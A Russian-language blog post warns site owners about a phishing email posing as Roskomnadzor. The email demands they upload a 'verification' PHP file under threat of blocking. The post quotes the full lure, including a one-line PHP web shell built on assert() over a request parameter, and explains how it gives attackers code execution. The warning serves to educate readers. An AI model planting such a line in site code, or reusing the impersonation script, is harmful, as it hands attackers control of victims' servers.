seoded (seoded) wrote,
seoded
seoded

Необычный развод под видом Роскомнадзора

Пост-предостережение, так как развод очень необычный и создан на волне блокировок Роскомнадзором.

Я думаю, что многие слышали, что Роскомнадзор в последнее время набрал много сотрудников, которые ищут в интернете запрещенную информацию и блокируют страницы в интернете. Параллельно с этим Роскомнадзор формирует «реестр организаторов распространения информации» (закон о блогерах). О внесении Хабра в этот список было объявлено 25 сентября 2014 года.

В любом случае Роскомнадзор заработал себе не очень хорошую репутацию и уверен, что владельцы сайтов бояться попасть в какой-нибудь список этой организации.

Сегодня моя хорошая знакомая прислала мне письмо в котором было написано, что её сайт с относительно небольшой посещаемостью внесен в этот реестр.

Текст письма ниже, орфография и пунктуация сохранены.

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени www.yandex.ru в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон „Об информации, информационных технологиях и о защите информации“ и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайтwww.yandex.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени www.yandex.ru, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id198617.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени www.yandex.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php

Путь до файла на Вашем сайте должен получиться следующий: www.yandex.ru/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени www.yandex.ru, следую инструкции указанной выше, то Ваш сайт www.yandex.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

— С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.


Уверен, что многим стало ясно, что это развод, однако мошенники сделали все, чтобы не сильно продвинутые пользователи выполнили действия по инструкции: письмо пришло с адреса zapret-info@roskomnadzor.org, поэтому неграмотный пользователь может подумать, что ему действительно написали из этой организации. При переходе на адрес roskomnadzor.org пользователя перекидывает на rkn.gov.ru что создает иллюзию реального сайта и домена. Домен roskomnadzor.org был зарегистрирован 6 дней назад.

Много действий от пользователя не нужно: создайте директорию, файл, напишите в этом файле одну строку.

Развод заключается в том, что пользователю предлагают создать файл с на первый взгляд безобидным php кодом. Однако, если посмотреть описание функции assert, то сразу станет ясно, что злоумышленники просто выполнят код, который будет указан в переменной roskomnadzor.

http://habrahabr.ru/post/265515/
Tags: безопасность, роскомнадзор, технологии
Subscribe

Posts from This Journal “безопасность” Tag

  • Post a new comment

    Error

    Anonymous comments are disabled in this journal

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

  • 0 comments